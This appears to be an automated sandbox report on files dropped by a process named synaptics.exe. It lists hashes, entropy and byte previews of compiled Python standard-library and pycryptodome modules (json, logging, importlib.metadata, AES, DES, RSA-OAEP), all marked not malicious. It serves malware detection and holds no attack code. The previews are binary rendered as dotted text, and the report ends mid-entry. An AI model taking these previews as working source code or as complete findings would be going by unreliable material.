                                                                                                                                                                                      Preview:o........'-d.........................@...s6...d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e...d.d.....Z.d.S.)......Nc........................s(...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.....Z.S.)...FreezableDefaultDicta!.... Often it is desirable to prevent the mutation of. a default dict after its initial construction, such. as to prevent mutation during iteration... >>> dd = FreezableDefaultDict(list). >>> dd[0].append('1'). >>> dd.freeze(). >>> dd[1]. []. >>> len(dd). 1. c........................s....t.|.d.t...j...|...S.).N.._frozen)...getattr..super..__missing__)...self..key....__class__...CC:\Users\Public\QExvbmVOb25l\lib\importlib\metadata\_collections.pyr........s......z FreezableDefaultDict.__missing__c........................s......f.d.d....._.d.S.).Nc........................s..........S.).N)...default_factory).r......r....r....r......<lambda>....s......z-FreezableDefaultDict.freeze.<locals>.<lambda>).r....r....r....r....r......freeze....s......z.FreezableDefa
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3122
                                                                                                                                                                                      Entropy (8bit):5.099012480219499
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:bHbuTGKoOIXlUsSUUEQ1lGIGX5G5GurSYwBpHPdG7lfsJdSOTK/J/SarXN0le/y/:SoOCDUX4sXwjvMXNpa5m1qoOIk
                                                                                                                                                                                      MD5:2F582BB9C2487DB134E9151251D7ABF3
                                                                                                                                                                                      SHA1:BE4B5312C7EA3C78DBA4E674C81156532ED25EB1
                                                                                                                                                                                      SHA-256:238BBEDBF5D7FF50D09CFCC16A798AFC5DB31D324943C4CE35D72293C0976E59
                                                                                                                                                                                      SHA-512:CE38E852763480ECCBE5716F480F55B856FABEA6AB0DEB0C3E19BAE91025FD44631EB5804DEFCE7B2ACBEBE6254D9C0802AC69F049D1B39894416C6FD27C7802
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s&...d.d.l.Z.d.d.l.Z.d.d.d...Z.d.d...Z.d.S.)......Nc........................s(.....p.t...........f.d.d...}.d.d...|._.|.S.).aV.... Wrap lru_cache to support storing the cache data in the object instances... Abstracts the common paradigm where the method explicitly saves an. underscore-prefixed protected property on first call and returns that. subsequently... >>> class MyClass:. ... calls = 0. .... ... @method_cache. ... def method(self, value):. ... self.calls += 1. ... return value.. >>> a = MyClass(). >>> a.method(3). 3. >>> for x in range(75):. ... res = a.method(x). >>> a.calls. 75.. Note that the apparent behavior will be exactly like that of lru_cache. except that the cache is stored on each instance, so values in one. instance will not flush values from another, and when an instance is. deleted, so are the cached values for that instance...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):584
                                                                                                                                                                                      Entropy (8bit):5.1754631872640635
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:Cu//48ZPUbmR6OHRgD4gvwfJLV0jyr4e+VlWsoVzoufN++k+Zqq18:ZDPUe6+k4fJgyEd/3ODlfnZqq18
                                                                                                                                                                                      MD5:9A58998F488FAD41F647EF17C4E75473
                                                                                                                                                                                      SHA1:DEC27CB647961DE00E613C788BF5DB87F62E5F0B
                                                                                                                                                                                      SHA-256:47A6511EC14D7AE358B5644C750AE5670ADC687C9BA39A4724C91A955152D017
                                                                                                                                                                                      SHA-512:A3E0637D1D2A7AB1E88D769687768DC03E04AB7B1373F3D7F52CACB0A3D8BB820653001E938B4AB16C138571B30F9B28E2FF015838F12409B38E047E5AF31782
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dr........................@...s....d.d.l.m.Z...d.d.d...Z.d.S.)......)...filterfalseNc....................c...sf.....t...}.|.j.}.|.d.u.r.t.|.j.|...D.].}.|.|.....|.V...q.d.S.|.D.].}.|.|...}.|.|.v.r0|.|.....|.V...q.d.S.).zHList unique elements, preserving order. Remember all elements ever seen.N)...set..addr......__contains__)...iterable..key..seenZ.seen_add..element..k..r.....AC:\Users\Public\QExvbmVOb25l\lib\importlib\metadata\_itertools.py..unique_everseen....s..................................r....).N)...itertoolsr....r....r....r....r....r......<module>....s........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2277
                                                                                                                                                                                      Entropy (8bit):4.728131821412717
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:OgnzBuSda0dUuJpYwj1JEZNmsZBCdHEjX9vlq:OgNuaa0dUAp/j1JErm8BCdHED90
                                                                                                                                                                                      MD5:D66D488C70AA8DB7494B85B0B9BAF650
                                                                                                                                                                                      SHA1:524D57EBA2AA4559F8B7AFFD8CF3C4CEE97BAE11
                                                                                                                                                                                      SHA-256:EBCF36AA14661C9EC17CD61FD1B9467A73BD4285C925B64DA65C6F8EEFE62D2A
                                                                                                                                                                                      SHA-512:1E386EA8D4FF77A835E9766ADF016248160B006941DC88D294EF4CD93E75D22DDA15C81E125A8353A3D03E721D05C001F69023B2F6BC874C348BA20E8FFCAE26
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sP...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.)......)...Any..Dict..Iterator..List..Protocol..TypeVar..Union.._Tc....................@...s....e.Z.d.Z.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e...f.d.d...Z.d.d.e.d.e.d.e.e.e...e.f...f.d.d...Z.e.d.e.e.e.e.e.e...f...f...f.d.d.....Z.d.S.)...PackageMetadata..returnc....................C........d.S...N......selfr....r.....<C:\Users\Public\QExvbmVOb25l\lib\importlib\metadata\_meta.py..__len__...........z.PackageMetadata.__len__..itemc....................C...r....r....r....).r....r....r....r....r......__contains__....r....z.PackageMetadata.__contains__..keyc....................C...r....r....r....).r....r....r....r....r......__getitem__....r....z.PackageMetadata.__getitem__c....................C...r....r....r....r....r....r....r......__iter__....r....z.PackageMetadata.__iter__...name..failobjc....................C........d.S.).zP. Return all value
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3073
                                                                                                                                                                                      Entropy (8bit):5.062882220134745
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:1OhFXWTrbGowYRzHinOrIAeQc2u4KryOqugqhFqYbvHqILqtk3RO/8C9HqL7dRjN:1EowCmVAeQgdqfq/qIqoqu9UHqHdRjqu
                                                                                                                                                                                      MD5:874750D4585F4E8EC80DC8D6F8F1F36B
                                                                                                                                                                                      SHA1:E2ADC94FBC1C4971051E0E23DCE850623F297FED
                                                                                                                                                                                      SHA-256:C297610AFA632C13A42B428B32FC9DBCCA38ECE3FDFC7F91E733CD751EDC26A7
                                                                                                                                                                                      SHA-512:F9BC17882257E40C24AB0C74580857C9C01331839A673125DC70FFCAB7DF762C3EE60751AC9C225A55B5751C0CC9D29CB908C433606560F8BC6BDFA7F912D114
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s(...d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.d.S.)......N.....)...method_cachec........................sr...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e...f.d.d.....Z.d.d...Z.d.d.d...Z.....Z.S.)...FoldedCasea{.... A case insensitive string class; behaves just like str. except compares equal when the only variation is case... >>> s = FoldedCase('hello world').. >>> s == 'Hello World'. True.. >>> 'Hello World' == s. True.. >>> s != 'Hello World'. False.. >>> s.index('O'). 4.. >>> s.split('O'). ['hell', ' w', 'rld'].. >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])). ['alpha', 'Beta', 'GAMMA'].. Sequence membership is straightforward... >>> "Hello World" in [s]. True. >>> s in ["Hello World"]. True.. You may test for set inclusion, but candidate and elements. must both be folded... >>> FoldedCase("Hello World") in {s}. True. >>> s in {FoldedCa
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12277
                                                                                                                                                                                      Entropy (8bit):5.384527163048202
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:gM0k25NKigD6B7+vx1GkRGqb9j4ytKv72vx1GkRGqb4MmQTQOQkQsx1LtbQkQsxz:gM0TNKigBvx99j4g3vxx47OZrXZrb/
                                                                                                                                                                                      MD5:F478A312375D5F5FB276A5AF4DBA7B89
                                                                                                                                                                                      SHA1:A5B9424ECA1B49B72F46C9DFBBE061DD40340EE6
                                                                                                                                                                                      SHA-256:63CBEA79B2CDEB9BDAA84285FF4C767B1B85201C488B227709781232530A8839
                                                                                                                                                                                      SHA-512:4FDABF830BC4720374299EC3A81E2BABB588106EB7412DED8F95F7B8067F8E533069F552BC6379A5F8A54A7426DFFE7A62AF10180938A45F73642ECBE73CA316
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d+8.......................@...s....d.Z.d.Z.g.d...Z.d.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.Z.e.d.d.d.d.d.d.d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d...Z.d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.d.d.d.d.d.d...d.d...Z.d.S.).a....JSON (JavaScript Object Notation) <https://json.org> is a subset of.JavaScript syntax (ECMA-262 3rd edition) used as a lightweight data.interchange format...:mod:`json` exposes an API familiar to users of the standard library.:mod:`marshal` and :mod:`pickle` modules. It is derived from a.version of the externally maintained simplejson library...Encoding basic Python object hierarchies::.. >>> import json. >>> json.dumps(['foo', {'bar': ('baz', None, 1.0, 2)}]). '["foo", {"bar": ["baz", null, 1.0, 2]}]'. >>> print(json.dumps("\"foo\bar")). "\"foo\bar". >>> print(json.dumps('\u1234')). "\u1234". >>> print(json.dumps('\\')). "\\". >>> print(json.dumps({"c": 0, "b": 0, "a": 0}, sort_keys=True)). {"
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9779
                                                                                                                                                                                      Entropy (8bit):5.568031850536481
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:CEe7HwzdSfu7lO+V4F9euIL0t1gwaF8mbANHFThJt7AeIsk9uYE5:1sHwzdT8+w9elwt28muIt4YQ
                                                                                                                                                                                      MD5:C55B1FFAF9BD9B5BB4139294A07C4E83
                                                                                                                                                                                      SHA1:F821977F1727A34067621407BA4B3618CA054F30
                                                                                                                                                                                      SHA-256:EA0A7A8CB3A7EBD2E8F125AC1FDF60F566F39703C7B33E3DA102877657214862
                                                                                                                                                                                      SHA-512:61B0AE01958181D5ACD70D50C469C518CADD01258850D4C4477BCE04DB08EE6FCFF6E70FB0BE9981B892E6868FA1C5B68C57124B23EB1AFE3FB07E068AED83B7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.2.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.d.g.Z.e.j.e.j.B.e.j.B.Z.e.d...Z.e.d...Z.e.d...Z.G.d.d...d.e...Z.e.e.e.d...Z.e...d.e...Z.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.e.e.j.f.d.d...Z.e.phe.Z.e...d.e...Z.d.Z.d.e.j.e.f.d.d...Z.e.j.e.f.d.d ..Z.G.d!d...d.e...Z.d.S.)"z.Implementation of JSONDecoder......N)...scanner)...scanstring..JSONDecoder..JSONDecodeError..nan..infz.-infc....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....a ...Subclass of ValueError with the following additional properties:.. msg: The unformatted error message. doc: The JSON document being parsed. pos: The start index of doc where parsing failed. lineno: The line corresponding to pos. colno: The column corresponding to pos.. c....................C...sb...|...d.d.|...d...}.|.|...d.d.|.....}.d.|.|.|.|.f...}.t...|.|.....|.|._.|.|._.|.|._.|.|._.|.|._.d.S.).N...r.........z.%s: line %d column %d (char %d))...count..rfind..ValueE
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11130
                                                                                                                                                                                      Entropy (8bit):5.497589119893164
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:UqBrTkkgsft4MszI6lxnP14KAZX/WPxDvoLabuHyjnFibetRv4UO4FR0Q:dJDiMUnd4CPxDzbuS7FiTEd
                                                                                                                                                                                      MD5:2C235BEA71367C2D1F2812BFBDAC077E
                                                                                                                                                                                      SHA1:54E79586843297AAE65548A2BF6A9AC49EDBB78D
                                                                                                                                                                                      SHA-256:64461C1765AD11EE76886E171D2A038D89F5428485554C123AE3B23FB1F0A26F
                                                                                                                                                                                      SHA-512:99E226288AEE475FA8F027B8B8C14A6EA43D6CF111DE3DADFA72486125816DF2A8ED6299FADD1CC7C0D3634FF1D8B4DBADD7DD3CD0A66295255F88A7437CDACD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.@.......................@...s6...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.yA......d.Z.Y.n.w.e...d...Z.e...d...Z.e...d...Z.d.d.d.d.d.d.d.d...Z.e.d...D.].Z.e...e.e...d...e.......q_e.d...Z.d.d...Z.e.pxe.Z.d.d...Z.e.p.e.Z.G.d.d...d.e...Z.e.e.e.e.e.e.e.e e!e.j"f.d.d...Z#d.S.).z.Implementation of JSONEncoder......N)...encode_basestring_ascii)...encode_basestring)...make_encoderz.[\x00-\x1f\\"\b\f\n\r\t]z.([\\"]|[^\ -~])s....[.-.]z.\\z.\"z.\bz.\fz.\nz.\rz.\t)...\.."................ .....\u{0:04x}..infc....................C........d.d...}.d.t...|.|.....d...S.).z5Return a JSON representation of a Python string.. c....................S...s....t.|...d.....S.).Nr....)...ESCAPE_DCT..group)...match..r.....0C:\Users\Public\QExvbmVOb25l\lib\json\encoder.py..replace(...s......z%py_encode_basestring.<locals>.replacer....)...ESCAPE..sub....sr....r....r....r......py_encode_basestring$...s........r....c................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1929
                                                                                                                                                                                      Entropy (8bit):5.6125424176839696
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:Uwhn/cfelN3xf9oI0rv3y1R0vSFkAVTdOIC54vD:j0MFLoPw5Td9CeD
                                                                                                                                                                                      MD5:B5AE1C592230A1627CACFD55ED8E3C1F
                                                                                                                                                                                      SHA1:401643B2E24CB492D282D23A5D17173978BACE31
                                                                                                                                                                                      SHA-256:2FC629042323C6EB09D29E055E1DC2330F5F83E2C1067D3B369C01A8D37F0954
                                                                                                                                                                                      SHA-512:8775BA0884AB7D79288CC28F2EC2A3779A53E51BF8835044E6E52C53476C4D7A6A43F69C937E4910ADEF5991760F2B3AC4046BD39C6CEC614492367E4C7CE16C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sh...d.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y.......d.Z.Y.n.w.d.g.Z.e...d.e.j.e.j.B.e.j.B...Z.d.d...Z.e.p1e.Z.d.S.).z.JSON token scanner......N)...make_scannerr....z)(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?c........................sv...|.j...|.j...|.j...t.j...|.j...|.j...|.j...|.j...|.j...|.j...|.j...........................f.d.d.........f.d.d...}.|.S.).Nc........................s....z.|.|...}.W.n...t.y.......t.|...d...w.|.d.k.r...|.|.d.......S.|.d.k.r0..|.|.d...f.............S.|.d.k.r=..|.|.d...f.....S.|.d.k.rQ|.|.|.d.......d.k.rQd.|.d...f.S.|.d.k.re|.|.|.d.......d.k.red.|.d...f.S.|.d.k.ry|.|.|.d.......d.k.ryd.|.d...f.S...|.|...}.|.d.u.r.|.....\.}.}.}.|.s.|.r...|.|.p.d...|.p.d.....}.n...|...}.|.|.....f.S.|.d.k.r.|.|.|.d.......d.k.r...d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.|.d.k.r.|.|.|.d.......d.k.r..d...|.d...f.S.t.|.....).N..".......{..[..n.....Z.null..t..trueT..f.....Z.falseF....N.......NaN..I.......Infinity..-.....z.-Infinit
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):66904
                                                                                                                                                                                      Entropy (8bit):5.226956492681782
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:pdNUC9zPGlE+L/8P4CcmsaS+rtz8lEp6wQh++5+VCKlv+g7tXcEOokQ02BbB:pdyg7e/8P4pmRSe58a6+rIZWLVxB
                                                                                                                                                                                      MD5:0538AA51A3A59B835DD42359EF7DCB39
                                                                                                                                                                                      SHA1:568EAFA9366D619DC8FC502C55A6D2261D078B49
                                                                                                                                                                                      SHA-256:C3BCF961B309143490391DC8DB37EDA8A72257A3E8797A9034AFB9ABD6739E4E
                                                                                                                                                                                      SHA-512:C383AF4018E8A0BE94897507A72E8743E76C3F1488041D2A9F402BD162A3A37B5DEE6AD694343AC570B669AF96A093207159C3755932E5ED0243000AE695DF39
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d=B.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.d.Z.e.....Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.Z.d.Z.e.Z.d.Z.d.Z d.Z!e.d.e.d.e.d.e.d.e d.e!d.i.Z"e.e.e.e.e.e.e e!d...Z#d.d...Z$d.d...Z%e&e.d...r.d.d...Z'n.d.d...Z'e.j(.)e%j*j+..Z,d d!..Z-e.....Z/d"d#..Z0d$d%..Z1e&e.d&..s.d'd(..Z2n.e..3..Z4d)d(..Z2d*d+..Z5e.j6e0e5e1d,....G.d-d...d.e7..Z8e8a9d/d0..Z:d1d2..Z;d3d4..Z<e...Z=[.G.d5d6..d6e7..Z>G.d7d8..d8e>..Z?G.d9d:..d:e>..Z@d;ZAe>eAf.e?d<f.e@d=f.d>..ZBG.d?d@..d@e7..Z.e...ZCG.dAdB..dBe7..ZDG.dCdD..dDe7..ZEG.dEdF..dFe7..ZFe..G..ZHg.ZIdGdH..ZJdIdJ..ZKG.dKdL..dLeF..ZLG.dMdN..dNeL..ZMG.dOdP..dPeM..ZNG.dQdR..dReM..ZOeOe...ZPePZQG.dSdT..dTe7..ZRdUdV..ZSdWdX..ZTG.dYdZ..dZe7..ZUG.d[d\..d\eF..ZVG.d]d^..d^eV..ZWeVaXG.d_d`..d`e7..ZYeWe...ZZeZeV_ZeUeVjZ..eV_[dadb..Z\d.dcdd..Z]dedf..Z^dgdh..Z_didj..Z`d.dk..dldm..Zadndo..Zbdpdq..Zcdrds..Zddtdu..Zedvdw..Zfe.f.dxdy..ZgeIf.dzd{..Zhd.d.liZiei.jeh..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7044
                                                                                                                                                                                      Entropy (8bit):5.346600306097393
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:FeGQHbITHl5m6xVZaGV/EXOZiHu/Eoft7TAUZmniQjzVHd2qE5:Fe7Hbk5nn9EXnHhItPdZ9QjI5
                                                                                                                                                                                      MD5:06626FDA113B68FEFE048B76BDA1F535
                                                                                                                                                                                      SHA1:1CD40ADA8AFF8D12C2638C13390F4D569C7B5C38
                                                                                                                                                                                      SHA-256:455C69E575B72EBF7EBC0BDEFEAA9A9369D3452AB607528FFDFAF90CA81A1454
                                                                                                                                                                                      SHA-512:924245956EB4188DEA61F2B67E80A725C73A7ECCA2AFB6A8455F13A40EC0CDFA3DAAA4D9A5D3119396C824CA73CAD620F94EA6D55C1725238C4419F331440223
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.#.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d.e...Z.z.d.Z.e.....rQe.d.e...d.d.....Z.W.n...e.y[......Y.n.w.d.d...Z.d.d...Z.d.d...Z d.Z!d.Z"d.S.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_features)...get_random_bytes.......................................................a..... int AES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int AES_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int AES_decrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int AES_stop_operation(void *state);.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4972
                                                                                                                                                                                      Entropy (8bit):5.174205755425086
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:NFDtaCGJ/VGx/uxVLM4x6stLAv74PJlQKGW:vwZApunM4ftcsPzJ
                                                                                                                                                                                      MD5:1F5DB3D208C72505864C44F407166AB8
                                                                                                                                                                                      SHA1:5479FF6F4E583A94EC51FD0A43BB946B0011793D
                                                                                                                                                                                      SHA-256:90E2DD7A7ECBAC158926CAC11CB92F0E5DA914CDE0E4C77AE16DC09DB6D1088E
                                                                                                                                                                                      SHA-512:9464C879DCFF43BA438A631E2C4B88A77D9E6B3D64FC43DD7FC39D6AE398615B0E14F14D31112AD357160390BF97A547C9FC2158AF510083CFA9A5C2C0385706
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.).a.....Module's constants for the modes of operation supported with Single DES:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Crypto.Cipher._raw_desa..... int DES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int DES_encrypt(const vo
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6185
                                                                                                                                                                                      Entropy (8bit):5.2644804204967315
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:W3Pz+cF8LjRVdNkIOMwKYRc/2QlAeiPTiC6TtLAvE4YMxbulb5ac:o+pB8Ms1aqPTi/tcfYSbwAc
                                                                                                                                                                                      MD5:40189A149B66C94209DE6D4A564F60F5
                                                                                                                                                                                      SHA1:038BA7592E21F34F267E0279C2F2BA9CE3571C22
                                                                                                                                                                                      SHA-256:E4E80E6ACF38F38582A7310FDA79825089A8289EC29D3B2CD10FC825930416E9
                                                                                                                                                                                      SHA-512:328621576DF16F791D1F3EBC91238F53BA87841D9E5B61842FBB6FEA4270595F6BF057681B4ED1DEDED02862E0DFF10B51F8195D9486B73F9CCD200C63F6E23C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.).a.....Module's constants for the modes of operation supported with Triple DES:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string..bchr..bord..bstr)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_tz.Crypto.Cipher._raw_des3a..... int DES3_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6949
                                                                                                                                                                                      Entropy (8bit):5.306199679374291
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:v5y77I5xO5Xqk0muV9jUAWWiD+wtDMgMzfEB1RZYVrdKlHbgKqkfzBA/CF:E7FFFpEMtQg/1g1dmrFf6qF
                                                                                                                                                                                      MD5:0C117E775FC565F9DB56CD65E6222162
                                                                                                                                                                                      SHA1:7F5FC1C5B1E13B352C87391E847C4FDCF3154141
                                                                                                                                                                                      SHA-256:94F53BEF1B0A5B0E0DF9EFCB915D853D6C6F47DCEB63982EFC9EA6D2359BC53E
                                                                                                                                                                                      SHA-512:1A6921871172D78E1EE6F94711CCDFB89366B1538CF45F44FF3ACA4F889DF78FE0F5A216BED3AFCCA88136E2D94BE6358A8D4EA8037948B49C72A5ECE642254C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fO".......................@...s|...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.d.d.d...Z.d.S.)......)...MGF1N)..._copy_bytes)...ceil_div..bytes_to_long..long_to_bytes)...strxor)...Random.....)...oaep_decodec....................@...s8...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...PKCS1OAEP_CipherzXCipher object for PKCS#1 v1.5 OAEP.. Do not create directly: use :func:`new` instead.c........................sN...|..._.|.r.|..._.n.t.j.j..._.|.r.|..._.n...f.d.d....._.t.d.d.|....._.|..._.d.S.).a....Initialize this PKCS#1 OAEP cipher object... :Parameters:. key : an RSA key object. If a private half is given, both encryption and decryption are possible.. If a public half is given, only encryption is possible.. hashAlgo : hash object. The hash function to use. This can be a module under `Crypto.Hash`. or an existing h
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1690
                                                                                                                                                                                      Entropy (8bit):5.4055277344199935
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:jzLMJbLqGllz8RRyglHGLtLaLaLLLLv+rLALiLLxLJLOfi:jzCbLqylz8RsghIfuai
                                                                                                                                                                                      MD5:A1C26FDC190243471647F85E4AF29737
